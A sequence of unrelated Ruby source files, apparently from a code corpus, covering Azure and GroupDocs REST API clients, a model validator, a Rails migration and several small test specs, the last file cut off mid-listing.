# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_with_http_info(resource_group_name, public_ip_prefix_name, custom_headers:nil)
begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers).value!
end
#
# Deletes the specified public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 204 || status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result
end
promise.execute
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def begin_create_or_update(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_or_update_with_http_info(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 201 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 201
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def begin_update_tags(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_tags_with_http_info(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Network::Mgmt::V2018_11_01::Models::TagsObject.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:patch, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] operation results.
#
def list_all_next(next_page_link, custom_headers:nil)
response = list_all_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_all_next_with_http_info(next_page_link, custom_headers:nil)
list_all_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_all_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all public IP prefixes in a resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] operation results.
#
def list_next(next_page_link, custom_headers:nil)
response = list_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets all public IP prefixes in a resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
list_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Gets all public IP prefixes in a resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] which provide lazy access to pages of the
# response.
#
def list_all_as_lazy(custom_headers:nil)
response = list_all_async(custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_all_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] which provide lazy access to pages of the
# response.
#
def list_as_lazy(resource_group_name, custom_headers:nil)
response = list_async(resource_group_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 42.574761 | 158 | 0.700035 |
aba1b96019d284cb0cdea1a4bdebcb318e7f106e | 44 | arr = [1, 5, 10, 20]
puts arr.find(&:even?)
| 14.666667 | 22 | 0.545455 |
62034c70711c50145ff20c5f9d50a357236e2406 | 1,366 | require 'minitest/autorun'
require 'BOAST'
require 'narray_ffi'
include BOAST
require_relative '../helper'
def silence_warnings(&block)
warn_level = $VERBOSE
$VERBOSE = nil
result = block.call
$VERBOSE = warn_level
result
end
class TestProcedure < Minitest::Test
def test_powercap
n = Int( :n, :dir => :in )
a = Int( :a, :dir => :in, :dim => [Dim(n)] )
b = Int( :b, :dir => :in, :dim => [Dim(n)] )
c = Int( :c, :dir => :inout, :dim => [Dim(n)] )
i = Int( :i )
j = Int( :j )
p = Procedure("vector_inc", [n, a, b, c]) {
decl i
decl j
pr For(j, 1, 32*1024) {
pr For(i, 1, n) {
pr c[i] === a[i] * b[i]
}
}
}
r = []
n = 1024
ah = NArray.int(n)
bh = NArray.int(n)
ch = NArray.int(n)
set_lang(C)
ah.random!(n)
bh.random!(n)
ch.random!(n)
k = p.ckernel
8.times { k.run(n, ah, bh, ch) }
r = k.run(n, ah, bh, ch)
t0 = r[:duration]
e0 = r[:energy]
8.times { k.run(n, ah, bh, ch) }
r = k.run(n, ah, bh, ch)
t1 = r[:duration]
e1 = r[:energy]
e0.each {|name, x|
energy0 = e0[name.to_sym]
energy1 = e1[name.to_sym]
next if name.to_s.include? 'uncore'
next if energy0 < 0.01 and energy1 < 0.01
assert(((energy0 / t0 - energy1 / t1).abs) / (energy1 / t1) < 0.1)
}
end
end
| 22.032258 | 72 | 0.508053 |
26ced028c403dd45d25f80274938695cb3bd3839 | 3,176 | class EvidenceItemValidator < ActiveModel::Validator
def validate(record)
validator = valid_types[record.evidence_type]
if validator.blank?
record.errors.add :evidence_type, "Invalid evidence type: #{record.evidence_type}"
return
end
if !validator[:clinical_significance].include? record.clinical_significance
record.errors.add :clinical_significance, "Not a valid clinical significance for #{record.evidence_type} evidence type: #{record.clinical_significance}. Valid values: #{validator[:clinical_significance].join(', ')}"
end
if !validator[:evidence_direction].include? record.evidence_direction
record.errors.add :evidence_direction, "Not a valid evidence direction for #{record.evidence_type} evidence type: #{record.evidence_direction}. Valid values: #{validator[:evidence_direction].join(', ')}"
end
if validator[:disease] && !record.disease_id
record.errors.add :disease_id, "Disease required for #{record.evidence_type} evidence type"
elsif !validator[:disease] && record.disease_id
record.errors.add :disease_id, "Disease cannot be set for #{record.evidence_type} evidence type"
end
if validator[:drug] && record.drug_ids.blank?
record.errors.add :drug_ids, "Drug(s) required for #{record.evidence_type} evidence type"
elsif !validator[:drug] && !record.drug_ids.blank?
record.errors.add :drug_ids, "Drug(s) cannot be set for #{record.evidence_type} evidence type"
end
if record.drug_ids.size > 1 && !record.drug_interaction_type
record.errors.add :drug_interaction_type, "Multiple drugs set but no drug interaction type provided"
end
if record.drug_ids.size < 2 && record.drug_interaction_type
record.errors.add :drug_interaction_type, "Drug interaction type cannot be set unless multiple drugs are specified."
end
end
def valid_types
@valid_types ||= {
'Predictive' => {
clinical_significance: ['Sensitivity/Response', 'Resistance', 'Adverse Response', 'Reduced Sensitivity', 'N/A'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: true,
drug: true,
},
'Diagnostic' => {
clinical_significance: ['Positive', 'Negative'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: true,
drug: false
},
'Prognostic' => {
clinical_significance: ['Better Outcome', 'Poor Outcome', 'N/A'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: true,
drug: false
},
'Predisposing' => {
clinical_significance: ['N/A'],
evidence_direction: ['N/A'],
disease: true,
drug: false
},
'Oncogenic' => {
clinical_significance: ['N/A'],
evidence_direction: ['N/A'],
disease: true,
drug: false
},
'Functional' => {
clinical_significance: ['Gain of Function', 'Loss of Function', 'Unaltered Function', 'Neomorphic', 'Dominant Negative', 'Unknown'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: false,
drug: false
},
}
end
end
| 39.7 | 221 | 0.664043 |
ac3967f4f77303ebe558a1a5f3d00697988cad19 | 1,145 | # frozen_string_literal: true
require 'spec_helper'
describe Ci::TriggerPresenter do
set(:user) { create(:user) }
set(:project) { create(:project) }
set(:trigger) do
create(:ci_trigger, token: '123456789abcd', project: project)
end
subject do
described_class.new(trigger, current_user: user)
end
before do
project.add_maintainer(user)
end
context 'when user is not a trigger owner' do
describe '#token' do
it 'exposes only short token' do
expect(subject.token).not_to eq trigger.token
expect(subject.token).to eq '1234'
end
end
describe '#has_token_exposed?' do
it 'does not have token exposed' do
expect(subject).not_to have_token_exposed
end
end
end
context 'when user is a trigger owner and builds admin' do
before do
trigger.update(owner: user)
end
describe '#token' do
it 'exposes full token' do
expect(subject.token).to eq trigger.token
end
end
describe '#has_token_exposed?' do
it 'has token exposed' do
expect(subject).to have_token_exposed
end
end
end
end
| 21.203704 | 65 | 0.657642 |
28a5cf8ca43661f0987c13b0fd51a09b7e65a91b | 297 | # frozen_string_literal: true
require 'spec_helper'
describe 'Tracking activity with ahoy' do
it 'stores specified action' do
3.times { visit test_index_path }
Ahoy::Event.take(3).each do |elem|
expect(elem.name).to eq 'index action of test controller invoked'
end
end
end
| 22.846154 | 71 | 0.717172 |
626bea0c626495aab656f947b0fb33512a9698c2 | 152 | class RemoveTermsOfServiceFromEventsSignUps < ActiveRecord::Migration[5.0]
def change
remove_column :events_sign_ups, :terms_of_service
end
end
| 25.333333 | 74 | 0.815789 |
e971a607a53391cf3246cc5857b760379351ed5e | 30,228 | # -----------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="folder.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
require 'uri'
require 'date'
module GroupDocsAnnotationCloud
#
# GroupDocs.Annotation Cloud API
#
class FolderApi
attr_accessor :config
#make FolderApi.new private
private_class_method :new
# Initializes new instance of FolderApi
#
# @param [config] Configuration
# @return [FolderApi] New instance of FolderApi
def initialize(config)
@config = config
@api_client = ApiClient.new(config)
@access_token = nil
end
# Initializes new instance of FolderApi
#
# @param [app_sid] Application identifier (App SID)
# @param [app_key] Application private key (App Key)
# @return [FolderApi] New instance of FolderApi
def self.from_keys(app_sid, app_key)
config = Configuration.new(app_sid, app_key)
return new(config)
end
# Initializes new instance of FolderApi
#
# @param [config] Configuration
# @return [FolderApi] New instance of FolderApi
def self.from_config(config)
return new(config)
end
# Copy folder
#
# @param request copy_folder_request
# @return [nil]
def copy_folder(request)
copy_folder_with_http_info(request)
nil
end
# Copy folder
#
# @param request copy_folder_request
# @return [Array<(nil, Fixnum, Hash)>]
# nil, response status code and response headers
def copy_folder_with_http_info(request)
raise ArgumentError, 'Incorrect request type' unless request.is_a? CopyFolderRequest
@api_client.config.logger.debug 'Calling API: FolderApi.copy_folder ...' if @api_client.config.debugging
# verify the required parameter 'src_path' is set
raise ArgumentError, 'Missing the required parameter src_path when calling FolderApi.copy_folder' if @api_client.config.client_side_validation && request.src_path.nil?
# verify the required parameter 'dest_path' is set
raise ArgumentError, 'Missing the required parameter dest_path when calling FolderApi.copy_folder' if @api_client.config.client_side_validation && request.dest_path.nil?
# resource path
local_var_path = '/annotation/storage/folder/copy/{srcPath}'
local_var_path = local_var_path.sub('{' + downcase_first_letter('srcPath') + '}', request.src_path.to_s)
# query parameters
query_params = {}
query_params[downcase_first_letter('destPath')] = request.dest_path
if local_var_path.include? ('{' + downcase_first_letter('srcStorageName') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('srcStorageName') + '}', request.src_storage_name.to_s)
else
query_params[downcase_first_letter('srcStorageName')] = request.src_storage_name unless request.src_storage_name.nil?
end
if local_var_path.include? ('{' + downcase_first_letter('destStorageName') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('destStorageName') + '}', request.dest_storage_name.to_s)
else
query_params[downcase_first_letter('destStorageName')] = request.dest_storage_name unless request.dest_storage_name.nil?
end
# header parameters
header_params = {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/json'])
# HTTP header 'Content-Type'
header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])
# form parameters
form_params = {}
# http body (model)
post_body = nil
data, status_code, headers = @api_client.call_api(:PUT, local_var_path,
header_params: header_params,
query_params: query_params,
form_params: form_params,
body: post_body,
access_token: get_access_token)
if @api_client.config.debugging
@api_client.config.logger.debug "API called:
FolderApi#copy_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
[data, status_code, headers]
end
# Create the folder
#
# @param request create_folder_request
# @return [nil]
def create_folder(request)
create_folder_with_http_info(request)
nil
end
# Create the folder
#
# @param request create_folder_request
# @return [Array<(nil, Fixnum, Hash)>]
# nil, response status code and response headers
def create_folder_with_http_info(request)
raise ArgumentError, 'Incorrect request type' unless request.is_a? CreateFolderRequest
@api_client.config.logger.debug 'Calling API: FolderApi.create_folder ...' if @api_client.config.debugging
# verify the required parameter 'path' is set
raise ArgumentError, 'Missing the required parameter path when calling FolderApi.create_folder' if @api_client.config.client_side_validation && request.path.nil?
# resource path
local_var_path = '/annotation/storage/folder/{path}'
local_var_path = local_var_path.sub('{' + downcase_first_letter('path') + '}', request.path.to_s)
# query parameters
query_params = {}
if local_var_path.include? ('{' + downcase_first_letter('storageName') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('storageName') + '}', request.storage_name.to_s)
else
query_params[downcase_first_letter('storageName')] = request.storage_name unless request.storage_name.nil?
end
# header parameters
header_params = {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/json'])
# HTTP header 'Content-Type'
header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])
# form parameters
form_params = {}
# http body (model)
post_body = nil
data, status_code, headers = @api_client.call_api(:PUT, local_var_path,
header_params: header_params,
query_params: query_params,
form_params: form_params,
body: post_body,
access_token: get_access_token)
if @api_client.config.debugging
@api_client.config.logger.debug "API called:
FolderApi#create_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
[data, status_code, headers]
end
# Delete folder
#
# @param request delete_folder_request
# @return [nil]
def delete_folder(request)
delete_folder_with_http_info(request)
nil
end
# Delete folder
#
# @param request delete_folder_request
# @return [Array<(nil, Fixnum, Hash)>]
# nil, response status code and response headers
def delete_folder_with_http_info(request)
raise ArgumentError, 'Incorrect request type' unless request.is_a? DeleteFolderRequest
@api_client.config.logger.debug 'Calling API: FolderApi.delete_folder ...' if @api_client.config.debugging
# verify the required parameter 'path' is set
raise ArgumentError, 'Missing the required parameter path when calling FolderApi.delete_folder' if @api_client.config.client_side_validation && request.path.nil?
# resource path
local_var_path = '/annotation/storage/folder/{path}'
local_var_path = local_var_path.sub('{' + downcase_first_letter('path') + '}', request.path.to_s)
# query parameters
query_params = {}
if local_var_path.include? ('{' + downcase_first_letter('storageName') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('storageName') + '}', request.storage_name.to_s)
else
query_params[downcase_first_letter('storageName')] = request.storage_name unless request.storage_name.nil?
end
if local_var_path.include? ('{' + downcase_first_letter('recursive') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('recursive') + '}', request.recursive.to_s)
else
query_params[downcase_first_letter('recursive')] = request.recursive unless request.recursive.nil?
end
# header parameters
header_params = {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/json'])
# HTTP header 'Content-Type'
header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])
# form parameters
form_params = {}
# http body (model)
post_body = nil
data, status_code, headers = @api_client.call_api(:DELETE, local_var_path,
header_params: header_params,
query_params: query_params,
form_params: form_params,
body: post_body,
access_token: get_access_token)
if @api_client.config.debugging
@api_client.config.logger.debug "API called:
FolderApi#delete_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
[data, status_code, headers]
end
# Get all files and folders within a folder
#
# @param request get_files_list_request
# @return [FilesList]
def get_files_list(request)
data, _status_code, _headers = get_files_list_with_http_info(request)
data
end
# Get all files and folders within a folder
#
# @param request get_files_list_request
# @return [Array<(FilesList, Fixnum, Hash)>]
# FilesList data, response status code and response headers
def get_files_list_with_http_info(request)
raise ArgumentError, 'Incorrect request type' unless request.is_a? GetFilesListRequest
@api_client.config.logger.debug 'Calling API: FolderApi.get_files_list ...' if @api_client.config.debugging
# verify the required parameter 'path' is set
raise ArgumentError, 'Missing the required parameter path when calling FolderApi.get_files_list' if @api_client.config.client_side_validation && request.path.nil?
# resource path
local_var_path = '/annotation/storage/folder/{path}'
local_var_path = local_var_path.sub('{' + downcase_first_letter('path') + '}', request.path.to_s)
# query parameters
query_params = {}
if local_var_path.include? ('{' + downcase_first_letter('storageName') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('storageName') + '}', request.storage_name.to_s)
else
query_params[downcase_first_letter('storageName')] = request.storage_name unless request.storage_name.nil?
end
# header parameters
header_params = {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/json'])
# HTTP header 'Content-Type'
header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])
# form parameters
form_params = {}
# http body (model)
post_body = nil
data, status_code, headers = @api_client.call_api(:GET, local_var_path,
header_params: header_params,
query_params: query_params,
form_params: form_params,
body: post_body,
access_token: get_access_token,
return_type: 'FilesList')
if @api_client.config.debugging
@api_client.config.logger.debug "API called:
FolderApi#get_files_list\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
[data, status_code, headers]
end
# Move folder
#
# @param request move_folder_request
